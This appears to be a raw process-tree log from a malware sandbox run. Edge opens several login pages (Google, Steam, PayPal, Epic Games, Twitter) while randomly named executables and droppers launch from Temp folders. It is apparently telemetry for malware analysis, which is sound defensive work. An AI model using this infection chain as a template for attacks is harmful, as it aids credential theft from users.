"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x74,0x170,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://store.steampowered.com/login/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://twitter.com/i/flow/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x160,0x170,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://steamcommunity.com/openid/loginform/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.epicgames.com/id/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.paypal.com/signin

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.youtube.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,9281595187323988520,2056582465994893598,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,9281595187323988520,2056582465994893598,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2116,16642066618724071249,4323023553145262805,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2116,16642066618724071249,4323023553145262805,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,4106837868613826304,289425145597700291,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,4206962479749433773,4865489325391933383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,4206962479749433773,4865489325391933383,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2864 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,4106837868613826304,289425145597700291,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,10912957019405315087,5462106055489411625,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2156 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,10912957019405315087,5462106055489411625,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11528675607525458648,5080355762399455558,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3856 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ff8434b46f8,0x7ff8434b4708,0x7ff8434b4718

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2eF6195.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2eF6195.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1552,3362796538378629707,9378066930329221642,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 /prefetch:3

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5340 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6576 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Kq45pA.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\7Kq45pA.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 7808 -ip 7808

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 7808 -s 540

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8JG513WP.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\8JG513WP.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7580 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3480 /prefetch:1

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7884 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7912 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9dE4Yb7.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\9dE4Yb7.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9940 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,9397433803907805924,16855859079461279069,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6148 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\9D93.exe

C:\Users\Admin\AppData\Local\Temp\9D93.exe

C:\Users\Admin\AppData\Local\Temp\CDBC.exe

C:\Users\Admin\AppData\Local\Temp\CDBC.exe

C:\Users\Admin\AppData\Local\Temp\D128.exe

C:\Users\Admin\AppData\Local\Temp\D128.exe

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\Broom.exe

C:\Users\Admin\AppData\Local\Temp\D128.exe

C:\Users\Admin\AppData\Local\Temp\D128.exe

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

